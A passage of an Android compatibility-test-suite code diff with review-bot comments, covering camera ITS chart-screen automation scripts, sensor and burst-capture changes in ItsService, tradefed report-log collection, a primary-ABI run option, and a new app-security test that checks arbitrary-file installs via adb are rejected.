+
scene_req = {
"scene0" : None,
"scene1" : "A grey card covering at least the middle 30% of the scene",
@@ -83,28 +90,34 @@
camera_ids = []
scenes = []
+ chart_host_id = None
for s in sys.argv[1:]:
if s[:7] == "camera=" and len(s) > 7:
camera_ids = s[7:].split(',')
elif s[:7] == "scenes=" and len(s) > 7:
scenes = s[7:].split(',')
+ elif s[:6] == 'chart=' and len(s) > 6:
+ chart_host_id = s[6:]
+
+ auto_scene_switch = chart_host_id is not None
# Run through all scenes if user does not supply one
+ possible_scenes = auto_scenes if auto_scene_switch else all_scenes
if not scenes:
- scenes = all_scenes
+ scenes = possible_scenes
else:
# Validate user input scene names
valid_scenes = True
temp_scenes = []
for s in scenes:
- if s in all_scenes:
+ if s in possible_scenes:
temp_scenes.append(s)
else:
try:
# Try replace "X" to "sceneX"
scene_num = int(s)
scene_str = "scene" + s
- if scene_str not in all_scenes:
+ if scene_str not in possible_scenes:
valid_scenes = False
break
temp_scenes.append(scene_str)
@@ -146,6 +159,14 @@
print "Running ITS on camera: %s, scene %s" % (camera_ids, scenes)
+ if auto_scene_switch:
+ print 'Waking up chart screen: ', chart_host_id
+ screen_id_arg = ('screen=%s' % chart_host_id)
+ cmd = ['python', os.path.join(os.environ['CAMERA_ITS_TOP'], 'tools',
+ 'wake_up_screen.py'), screen_id_arg]
+ retcode = subprocess.call(cmd)
+ assert retcode == 0
+
for camera_id in camera_ids:
# Loop capturing images until user confirm test scene is correct
camera_id_arg = "camera=" + camera_id
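Review bot: The wake-up step resolves its script through `os.environ['CAMERA_ITS_TOP']`, while the other tools visible in this diff are located with `os.getcwd()`, so a shell where the variable is not exported dies with KeyError here; the shutdown hunk near the end of `main()` does the same. Pick one way of locating `tools/`, or fail with a clear message when the variable is missing. `assert retcode == 0` also proves little, since wake_up_screen.py as added in this commit does not check the result of its adb calls.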
@@ -169,18 +190,34 @@
if scene_req[scene] != None:
out_path = os.path.join(topdir, camera_id, scene+".jpg")
out_arg = "out=" + out_path
- scene_arg = "scene=" + scene_req[scene]
- extra_args = scene_extra_args.get(scene, [])
- cmd = ['python',
- os.path.join(os.getcwd(),"tools/validate_scene.py"),
- camera_id_arg, out_arg, scene_arg, device_id_arg] + \
- extra_args
+ if auto_scene_switch:
+ scene_arg = "scene=" + scene
+ cmd = ['python',
+ os.path.join(os.getcwd(), 'tools/load_scene.py'),
+ scene_arg, screen_id_arg]
+ else:
+ scene_arg = "scene=" + scene_req[scene]
+ extra_args = scene_extra_args.get(scene, [])
+ cmd = ['python',
+ os.path.join(os.getcwd(),"tools/validate_scene.py"),
+ camera_id_arg, out_arg,
+ scene_arg, device_id_arg] + extra_args
retcode = subprocess.call(cmd,cwd=topdir)
assert(retcode == 0)
print "Start running ITS on camera %s, %s" % (camera_id, scene)
# Run each test, capturing stdout and stderr.
for (testname,testpath) in tests:
+ if auto_scene_switch:
+ # Send an input event to keep the screen not dimmed.
+ # Since we are not using camera of chart screen, FOCUS event
+ # should does nothing but keep the screen from dimming.
+ # The "sleep after x minutes of inactivity" display setting
+ # determines how long this command can keep screen bright.
+ # Setting it to something like 30 minutes should be enough.
+ cmd = ('adb -s %s shell input keyevent FOCUS'
+ % chart_host_id)
+ subprocess.call(cmd.split())
cmd = ['python', os.path.join(os.getcwd(),testpath)] + \
sys.argv[1:] + [camera_id_arg]
outdir = os.path.join(topdir,camera_id,scene)
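Review bot: In the `auto_scene_switch` branch `validate_scene.py` is skipped entirely, and the `assert(retcode == 0)` that follows only covers `load_scene.py`, which starts its adb commands with `Popen` and returns before knowing whether the push or the VIEW intent worked. A run can therefore proceed against a blank or stale chart without any failure being recorded; a comment stating that limitation, or a status check in load_scene.py, would make it explicit. The keep-awake command would be clearer as a list, `subprocess.call(['adb', '-s', chart_host_id, 'shell', 'input', 'keyevent', 'FOCUS'])`, and the comment's "should does nothing" should read "should do nothing".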
@@ -243,6 +280,14 @@
print "Reporting ITS result to CtsVerifier"
its.device.report_result(device_id, camera_id, results)
+ if auto_scene_switch:
+ print 'Shutting down chart screen: ', chart_host_id
+ screen_id_arg = ('screen=%s' % chart_host_id)
+ cmd = ['python', os.path.join(os.environ['CAMERA_ITS_TOP'], 'tools',
+ 'turn_off_screen.py'), screen_id_arg]
+ retcode = subprocess.call(cmd)
+ assert retcode == 0
+
print "ITS tests finished. Please go back to CtsVerifier and proceed"
if __name__ == '__main__':
diff --git a/apps/CameraITS/tools/turn_off_screen.py b/apps/CameraITS/tools/turn_off_screen.py
new file mode 100644
index 0000000..4163ab4
--- /dev/null
+++ b/apps/CameraITS/tools/turn_off_screen.py
@@ -0,0 +1,42 @@
+# Copyright 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import re
+import subprocess
+import sys
+
+
+def main():
+ """Put screen to sleep."""
+ screen_id = ''
+ for s in sys.argv[1:]:
+ if s[:7] == 'screen=' and len(s) > 7:
+ screen_id = s[7:]
+
+ if not screen_id:
+ print 'Error: need to specify screen serial'
+ assert False
+
+ cmd = ('adb -s %s shell dumpsys power | egrep "Display Power"'
+ % screen_id)
+ process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
+ cmd_ret = process.stdout.read()
+ screen_state = re.split(r'[s|=]', cmd_ret)[-1]
+ if screen_state == 'OFF\n':
+ print 'Screen OFF. Turning ON.'
+ else:
+ wakeup = ('adb -s %s shell input keyevent POWER' % screen_id)
+ subprocess.Popen(wakeup.split())
+if __name__ == '__main__':
+ main()
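Review bot: The `'OFF\n'` branch prints `'Screen OFF. Turning ON.'` and then does nothing, a message carried over from wake_up_screen.py; it should say the screen is already off, e.g. `print 'Screen already OFF.'`. The exact comparison with `'OFF\n'` breaks if adb returns `\r\n`; `if 'OFF' in screen_state:` as used in wake_up_screen.py is safer. The pattern `r'[s|=]'` is a character class matching the letter `s`, `|` or `=`, which looks like a mistyped `\s`; splitting on `'='` alone expresses the intent, and the same pattern appears in wake_up_screen.py.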
diff --git a/apps/CameraITS/tools/wake_up_screen.py b/apps/CameraITS/tools/wake_up_screen.py
new file mode 100644
index 0000000..68a974a
--- /dev/null
+++ b/apps/CameraITS/tools/wake_up_screen.py
@@ -0,0 +1,60 @@
+# Copyright 2015 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import re
+import subprocess
+import sys
+import time
+
+DISPLAY_LEVEL = 96 # [0:255] Depends on tablet model. Adjust for best result.
+DISPLAY_WAIT = 0.5 # seconds. Screen commands take time to have effect
+
+
+def main():
+ """Power up and unlock screen as needed."""
+ screen_id = None
+ for s in sys.argv[1:]:
+ if s[:7] == 'screen=' and len(s) > 7:
+ screen_id = s[7:]
+
+ if not screen_id:
+ print 'Error: need to specify screen serial'
+ assert False
+
+ # turn on screen if necessary and unlock
+ cmd = ('adb -s %s shell dumpsys display | egrep "mScreenState"'
+ % screen_id)
+ process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
+ cmd_ret = process.stdout.read()
+ screen_state = re.split(r'[s|=]', cmd_ret)[-1]
+ if 'OFF' in screen_state:
+ print 'Screen OFF. Turning ON.'
+ wakeup = ('adb -s %s shell input keyevent POWER' % screen_id)
+ subprocess.Popen(wakeup.split())
+ time.sleep(DISPLAY_WAIT)
+ unlock = ('adb -s %s wait-for-device shell wm dismiss-keyguard'
+ % screen_id)
+ subprocess.Popen(unlock.split())
+ time.sleep(DISPLAY_WAIT)
+
+ # set brightness
+ print 'Tablet display brightness set to %d' % DISPLAY_LEVEL
+ bright = ('adb -s %s shell settings put system screen_brightness %d'
+ % (screen_id, DISPLAY_LEVEL))
+ subprocess.Popen(bright.split())
+ time.sleep(DISPLAY_WAIT)
+
+
+if __name__ == '__main__':
+ main()
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index 8b96c00..15da68f 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.cts.verifier"
android:versionCode="5"
- android:versionName="7.0_r7">
+ android:versionName="7.0_r0">
<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="24"/>
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java b/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java
index 6f54821..9a7c351 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/camera/its/ItsService.java
@@ -197,6 +197,8 @@
private volatile LinkedList<MySensorEvent> mEvents = null;
private volatile Object mEventLock = new Object();
private volatile boolean mEventsEnabled = false;
+ private HandlerThread mSensorThread = null;
+ private Handler mSensorHandler = null;
public interface CaptureCallback {
void onCaptureAvailable(Image capture);
@@ -228,9 +230,15 @@
mAccelSensor = mSensorManager.getDefaultSensor(Sensor.TYPE_ACCELEROMETER);
mMagSensor = mSensorManager.getDefaultSensor(Sensor.TYPE_MAGNETIC_FIELD);
mGyroSensor = mSensorManager.getDefaultSensor(Sensor.TYPE_GYROSCOPE);
- mSensorManager.registerListener(this, mAccelSensor, SensorManager.SENSOR_DELAY_FASTEST);
- mSensorManager.registerListener(this, mMagSensor, SensorManager.SENSOR_DELAY_FASTEST);
- mSensorManager.registerListener(this, mGyroSensor, SensorManager.SENSOR_DELAY_FASTEST);
+ mSensorThread = new HandlerThread("SensorThread");
+ mSensorThread.start();
+ mSensorHandler = new Handler(mSensorThread.getLooper());
+ mSensorManager.registerListener(this, mAccelSensor,
+ SensorManager.SENSOR_DELAY_NORMAL, mSensorHandler);
+ mSensorManager.registerListener(this, mMagSensor,
+ SensorManager.SENSOR_DELAY_NORMAL, mSensorHandler);
+ mSensorManager.registerListener(this, mGyroSensor,
+ /*200hz*/5000, mSensorHandler);
// Get a handle to the system vibrator.
mVibrator = (Vibrator)getSystemService(Context.VIBRATOR_SERVICE);
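Review bot: The gyroscope registration passes a bare `5000` annotated only by an inline `/*200hz*/`, while the two calls above it use named SensorManager constants. That argument is a sampling period in microseconds, so a named constant would make the unit and the intent explicit, for example `private static final int GYRO_SAMPLING_PERIOD_US = 5000; // 200 Hz`. The enclosing method starts and ends outside this hunk.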
@@ -291,6 +299,10 @@
mSaveThreads[i] = null;
}
}
+ if (mSensorThread != null) {
+ mSensorThread.quitSafely();
+ mSensorThread = null;
+ }
if (mResultThread != null) {
mResultThread.quitSafely();
mResultThread = null;
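Review bot: The added teardown quits mSensorThread, but no `unregisterListener` call is visible in this hunk, so the three listeners registered against mSensorHandler may still be registered when the looper stops. If the listener is not unregistered elsewhere in this method, add `mSensorManager.unregisterListener(this);` before `mSensorThread.quitSafely();` so that no sensor events are posted to a handler whose thread has exited. The method body continues outside the hunk.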
@@ -1277,6 +1289,8 @@
// Initiate the captures.
long maxExpTimeNs = -1;
+ List<CaptureRequest> requestList =
+ new ArrayList<>(requests.size());
for (int i = 0; i < requests.size(); i++) {
CaptureRequest.Builder req = requests.get(i);
// For DNG captures, need the LSC map to be available.
@@ -1291,8 +1305,9 @@
for (int j = 0; j < numCaptureSurfaces; j++) {
req.addTarget(mOutputImageReaders[j].getSurface());
}
- mSession.capture(req.build(), mCaptureResultListener, mResultHandler);
+ requestList.add(req.build());
}
+ mSession.captureBurst(requestList, mCaptureResultListener, mResultHandler);
long timeout = TIMEOUT_CALLBACK * 1000;
if (maxExpTimeNs > 0) {
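Review bot: `mSession.captureBurst(requestList, ...)` is now called unconditionally after the loop, and as far as I know the framework rejects an empty request list with an IllegalArgumentException, whereas the old per-request `capture` loop did nothing for zero requests. Whether `requests` can be empty here depends on validation outside this hunk. If it can, guard the call with `if (!requestList.isEmpty())`, or report the empty request list explicitly before the loop. The loop itself starts in the previous hunk.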
@@ -1478,6 +1493,11 @@
}
@Override
+ public final void onAccuracyChanged(Sensor sensor, int accuracy) {
+ Logt.i(TAG, "Sensor " + sensor.getName() + " accuracy changed to " + accuracy);
+ }
+
+ @Override
public final void onSensorChanged(SensorEvent event) {
synchronized(mEventLock) {
if (mEventsEnabled) {
@@ -1492,10 +1512,6 @@
}
}
- @Override
- public final void onAccuracyChanged(Sensor sensor, int accuracy) {
- }
-
private final CaptureCallback mCaptureCallback = new CaptureCallback() {
@Override
public void onCaptureAvailable(Image capture) {
diff --git a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
index 385f22f..d2380af 100644
--- a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
+++ b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
@@ -18,7 +18,6 @@
import android.app.KeyguardManager;
import android.content.Context;
-import android.os.Build;
/**
* ScreenLockHelper is used to check whether the device is protected by a locked screen.
@@ -30,9 +29,6 @@
* is no way to programmatically distinguish between the two.
*/
public static boolean isDeviceSecure(Context context) {
- if (Build.VERSION.SDK_INT < Build.VERSION_CODES.M) {
- return true; // KeyguardManager.isDeviceSecure() added in M, skip this check
- }
KeyguardManager km = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);
return km.isDeviceSecure();
}
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
index a1c8a4a..ccb9faf 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
@@ -17,6 +17,7 @@
package com.android.compatibility.common.tradefed.targetprep;
import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
+import com.android.compatibility.common.tradefed.util.CollectorUtil;
import com.android.tradefed.build.IBuildInfo;
import com.android.tradefed.config.Option;
import com.android.tradefed.device.DeviceNotAvailableException;
@@ -27,18 +28,8 @@
import com.android.tradefed.targetprep.TargetSetupError;
import com.android.tradefed.util.FileUtil;
-import java.io.BufferedReader;
-import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
-import java.io.FileReader;
-import java.io.FileWriter;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
/**
* An {@link ITargetCleaner} that prepares and pulls report logs.
@@ -59,12 +50,12 @@
@Override
public void setUp(ITestDevice device, IBuildInfo buildInfo) throws TargetSetupError,
- BuildError, DeviceNotAvailableException {
+ BuildError, DeviceNotAvailableException {
prepareReportLogContainers(device, buildInfo);
}
private void addBuildInfo(ITestDevice device, IBuildInfo buildInfo, String key, String value)
- throws DeviceNotAvailableException {
+ throws DeviceNotAvailableException {
}
private void prepareReportLogContainers(ITestDevice device, IBuildInfo buildInfo) {
@@ -103,93 +94,12 @@
CLog.e("%s is not a directory", hostReportDir.getAbsolutePath());
return;
}
- pull(device, mSrcDir, hostReportDir, resultDir);
- reformatRepeatedStreams(resultDir);
+ String resultPath = resultDir.getAbsolutePath();
+ CollectorUtil.pullFromDevice(device, mSrcDir, resultPath);
+ CollectorUtil.pullFromHost(hostReportDir, resultDir);
+ CollectorUtil.reformatRepeatedStreams(resultDir);
} catch (Exception exception) {
exception.printStackTrace();
}
}
-
- private void pull(ITestDevice device, String deviceSrc, File hostDir, File destDir) {
- String hostSrc = hostDir.getAbsolutePath();
- String dest = destDir.getAbsolutePath();
- String deviceSideCommand = String.format("adb -s %s pull %s %s", device.getSerialNumber(),
- deviceSrc, dest);
- try {
- if (device.doesFileExist(deviceSrc)) {
- Process deviceProcess = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
- deviceSideCommand});
- if (deviceProcess.waitFor() != 0) {
- CLog.e("Failed to run %s", deviceSideCommand);
- }
- }
- FileUtil.recursiveCopy(hostDir, destDir);
- FileUtil.recursiveDelete(hostDir);
- } catch (Exception e) {
- CLog.e("Caught exception during pull.");
- CLog.e(e);
- }
- }
-
- private void reformatRepeatedStreams(File resultDir) throws IOException, FileNotFoundException {
- File[] reportLogs = resultDir.listFiles();
- // Sometimes report logs are in a sub-directory.
- if (reportLogs.length == 1 && reportLogs[0].isDirectory()) {
- reportLogs = reportLogs[0].listFiles();
- }
- for (File reportLog : reportLogs) {
- try (BufferedReader metricsReader = new BufferedReader(new FileReader(reportLog))) {
- // Get metrics as string.
- StringBuilder metricBuilder = new StringBuilder();
- String line;
- while ((line = metricsReader.readLine()) != null) {
- metricBuilder.append(line);
- }
- String metrics = metricBuilder.toString();
- // Create map of stream names and metrics.
- HashMap<String, List<String>> metricsMap = new HashMap<>();
- String pattern = "\\\"([a-z0-9_]*)\\\":(\\{[^{}]*\\})";
- Pattern p = Pattern.compile(pattern);
- Matcher m = p.matcher(metrics);
- while (m.find()) {
- String key = m.group(1);
- String value = m.group(2);
- if (!metricsMap.containsKey(key)) {
- metricsMap.put(key, new ArrayList<String>());
- }
- metricsMap.get(key).add(value);
- }
- // Rewrite metrics as arrays.
- StringBuilder newMetricsBuilder = new StringBuilder();
- newMetricsBuilder.append("{");
- boolean firstLine = true;
- for (String key: metricsMap.keySet()) {
- if (!firstLine) {
- newMetricsBuilder.append(",");
- } else {
- firstLine = false;
- }
- newMetricsBuilder.append("\"").append(key).append("\":[");
- boolean firstValue = true;
- for (String stream : metricsMap.get(key)) {
- if (!firstValue) {
- newMetricsBuilder.append(",");
- }
- else {
- firstValue = false;
- }
- newMetricsBuilder.append(stream);
- }
- newMetricsBuilder.append("]");
- }
- newMetricsBuilder.append("}");
- reportLog.createNewFile();
- try (BufferedWriter metricsWriter = new BufferedWriter(new
- FileWriter(reportLog))) {
- String newMetrics = newMetricsBuilder.toString();
- metricsWriter.write(newMetrics, 0, newMetrics.length());
- }
- }
- }
- }
}
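Review bot: `CollectorUtil.pullFromDevice(device, mSrcDir, resultPath)` is not visible in this hunk, so confirm that it does not carry over the shell string used by the removed `pull`. That method formatted `adb -s %s pull %s %s` from the device serial, the `mSrcDir` option value and the destination path, and ran it through `/bin/bash -c`, where a path with spaces or shell metacharacters is reinterpreted by the shell. Passing the arguments as an array, or using the device API (`device.pullDir(mSrcDir, resultDir)`), avoids that. Failures from the three new calls also still end in the existing `exception.printStackTrace()`; `CLog.e(exception)` would keep them in the tradefed log. prepareReportLogContainers starts outside the hunk.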
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
index f63093c..42391f1 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
@@ -98,6 +98,7 @@
private static final String SHARD_OPTION = "shards";
public static final String SKIP_DEVICE_INFO_OPTION = "skip-device-info";
public static final String SKIP_PRECONDITIONS_OPTION = "skip-preconditions";
+ public static final String PRIMARY_ABI_RUN = "primary-abi-only";
public static final String DEVICE_TOKEN_OPTION = "device-token";
public static final String LOGCAT_ON_FAILURE_SIZE_OPTION = "logcat-on-failure-size";
private static final String URL = "dynamic-config-url";
@@ -201,6 +202,11 @@
description = "Whether preconditions should be skipped")
private boolean mSkipPreconditions = false;
+ @Option(name = PRIMARY_ABI_RUN,
+ description = "Whether to run tests with only the device primary abi. "
+ + "This override the --abi option.")
+ private boolean mPrimaryAbiRun = false;
+
@Option(name = DEVICE_TOKEN_OPTION,
description = "Holds the devices' tokens, used when scheduling tests that have"
+ "prerequisites such as requiring a SIM card. Format is <serial>:<token>",
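Review bot: The description of `primary-abi-only` says it overrides `--abi`, but the getAbis hunk further down does the opposite. When mAbiName is already set, it logs that the ABI option supersedes `primary-abi-only` and keeps the ABI that was given. The description should say so, for example `+ "This is ignored when --abi is given."` in place of `+ "This override the --abi option."`.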
@@ -426,7 +432,9 @@
}
// execute pre module execution checker
- runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+ if (checkers != null && !checkers.isEmpty()) {
+ runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+ }
try {
module.run(listener);
} catch (DeviceUnresponsiveException due) {
@@ -456,7 +464,9 @@
TimeUtil.formatElapsedTime(expected),
TimeUtil.formatElapsedTime(duration));
}
- runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+ if (checkers != null && !checkers.isEmpty()) {
+ runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+ }
}
} catch (FileNotFoundException fnfe) {
throw new RuntimeException("Failed to initialize modules", fnfe);
@@ -472,6 +482,15 @@
Set<IAbi> getAbis() throws DeviceNotAvailableException {
Set<IAbi> abis = new HashSet<>();
Set<String> archAbis = AbiUtils.getAbisForArch(SuiteInfo.TARGET_ARCH);
+ if (mPrimaryAbiRun) {
+ if (mAbiName == null) {
+ // Get the primary from the device and make it the --abi to run.
+ mAbiName = mDevice.getProperty("ro.product.cpu.abi").trim();
+ } else {
+ CLog.d("Option --%s supersedes the option --%s, using abi: %s", ABI_OPTION,
+ PRIMARY_ABI_RUN, mAbiName);
+ }
+ }
for (String abi : AbiFormatter.getSupportedAbis(mDevice, "")) {
// Only test against ABIs supported by Compatibility, and if the
// --abi option was given, it must match.
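Review bot: `mDevice.getProperty("ro.product.cpu.abi").trim()` dereferences the result without a null check. getProperty can return null when the property cannot be read, which would surface as a NullPointerException rather than the IllegalArgumentException the next hunk shows this method using for ABI problems. Read it into a local first, `String primary = mDevice.getProperty("ro.product.cpu.abi");`, then `if (primary == null) throw new IllegalArgumentException("Could not get device's primary ABI");` before `mAbiName = primary.trim();`. getAbis continues outside the hunk.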
@@ -480,7 +499,7 @@
abis.add(new Abi(abi, AbiUtils.getBitness(abi)));
}
}
- if (abis == null || abis.isEmpty()) {
+ if (abis.isEmpty()) {
if (mAbiName == null) {
throw new IllegalArgumentException("Could not get device's ABIs");
} else {
diff --git a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
index 530bd09..dba3128 100644
--- a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
+++ b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
@@ -36,7 +36,6 @@
*/
public class MetadataReporterTest extends TestCase {
- private static final String ROOT_PROPERTY = "TESTS_ROOT";
private static final String MIN_TEST_DURATION = "10";
private static final String BUILD_NUMBER = "2";
private static final String SUITE_PLAN = "cts";
@@ -73,7 +72,7 @@
mBase.mkdirs();
mTests = new File(mBase, TESTCASES);
mTests.mkdirs();
- System.setProperty(ROOT_PROPERTY, mRoot.getAbsolutePath());
+ System.setProperty(CompatibilityBuildHelper.ROOT_DIR, mRoot.getAbsolutePath());
mBuildInfo = new BuildInfo(BUILD_NUMBER, "", "");
mBuildHelper = new CompatibilityBuildHelper(mBuildInfo);
mBuildHelper.init(SUITE_PLAN, DYNAMIC_CONFIG_URL, START_TIME);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
index 00acdf5..e500b00 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
@@ -25,9 +25,17 @@
import com.android.tradefed.testtype.IAbi;
import com.android.tradefed.testtype.IAbiReceiver;
import com.android.tradefed.testtype.IBuildReceiver;
+import com.android.tradefed.util.RunUtil;
+import java.io.BufferedReader;
+import java.io.EOFException;
import java.io.File;
import java.io.FileNotFoundException;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.util.ArrayList;
+import java.util.List;
/**
* Set of tests that verify various security checks involving multiple apps are
@@ -289,6 +297,26 @@
}
}
+ /**
+ * Tests that an arbitrary file cannot be installed using the 'cmd' command.
+ */
+ public void testAdbInstallFile() throws Exception {
+ final List<String> output = AdbOutputReader.getOutput(5000L, new String[] {
+ "adb",
+ "-s",
+ getDevice().getSerialNumber(),
+ "shell",
+ "cmd",
+ "package",
+ "install",
+ "-S",
+ "1024",
+ "/data/local/tmp/foo.apk",
+ });
+ assertEquals("Line count", 1, output.size());
+ assertEquals("Error text", "Error: APK content must be streamed", output.get(0));
+ }
+
private void runDeviceTests(String packageName) throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName);
}
@@ -297,4 +325,66 @@
throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
}
+
+ /** Helper class to collect the output from a command. */
+ private static class AdbOutputReader {
+ public static List<String> getOutput(long timeout, String... command) throws Exception {
+ final Process adbProcess = RunUtil.getDefault().runCmdInBackground(command);
+ final InputStream in = adbProcess.getInputStream();
+ final List<String> lines = new ArrayList<>();
+ final Object threadLock = new Object();
+ final Thread t = new Thread(new Runnable() {
+ @Override
+ public void run() {
+ synchronized (threadLock) {
+ readLines(in, lines);
+ threadLock.notify();
+ }
+ }
+ });
+ final long end = System.currentTimeMillis() + timeout;
+ synchronized (threadLock) {
+ t.start();
+ long now = System.currentTimeMillis();
+ while (now < end) {
+ try {
+ threadLock.wait(end - now);
+ } catch (InterruptedException e) {
+ now = System.currentTimeMillis();
+ continue;
+ }
+ break;
+ }
+ }
+ adbProcess.destroy();
+ t.join();
+ return lines;
+ }
+
+ private static void readLines(InputStream in, List<String> lines) {
+ BufferedReader br = null;
+ try {
+ br = new BufferedReader(new InputStreamReader(in));
+ String line;
+ while ((line = readLineIgnoreException(br)) != null) {
+ lines.add(line);
+ }
+ } catch (IOException ignore) {
+ } finally {
+ if (br != null) {
+ try {
+ br.close();
+ } catch (IOException ignore) { }
+ }
+ }
+ }
+
+ private static String readLineIgnoreException(BufferedReader reader) throws IOException {
+ try {
+ return reader.readLine();
+ } catch (EOFException ignore) {
+ return null;
+ }
+ }
+ }
}
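Review bot: The timeout in `AdbOutputReader.getOutput` cannot take effect while the command's output stream is still open. The reader thread holds `threadLock` for the whole of `readLines`, and `threadLock.wait(end - now)` must re-acquire that monitor before it returns, so the main thread stays blocked and `adbProcess.destroy()` is not reached. A hung `adb` would then hang the test instead of failing it after the 5 seconds passed in by testAdbInstallFile. Running `readLines(in, lines)` unsynchronized in the Runnable and replacing the wait loop with `t.start(); t.join(timeout); adbProcess.destroy(); t.join();` bounds the wait as intended. It also removes the case where a spurious wake-up from `wait` is treated as completion.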
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
index a4686aa..99a7e8f 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
@@ -111,9 +111,6 @@
/**
* If device doesn't have native FBE, verify normal lifecycle.
- * Note: This test will have a false-negative on the emulator because of the
- * tradefed and ddmlib incorrectly special-case handling the emulator which
- * is fixed in http://r.android.com/315302
*/
public void testDirectBootNone() throws Exception {
if (!isSupportedDevice()) {
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
index c49340e..52dc79b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
@@ -224,6 +224,10 @@
// Verify they can't poke at each other
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", owner);
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", secondary);
+
+ // Verify they can't access other users' content using media provider
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", owner);
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", secondary);
} finally {
getDevice().uninstallPackage(MULTIUSER_PKG);
removeUsersForTest(users);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
index 072a533..050845b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
@@ -29,12 +29,18 @@
* dynamic granting and behavior of legacy apps.
*/
public class PermissionsHostTest extends DeviceTestCase implements IAbiReceiver, IBuildReceiver {
- private static final String PKG = "com.android.cts.usepermission";
+ private static final String USES_PERMISSION_PKG = "com.android.cts.usepermission";
+ private static final String ESCALATE_PERMISSION_PKG = "com.android.cts.escalate.permission";
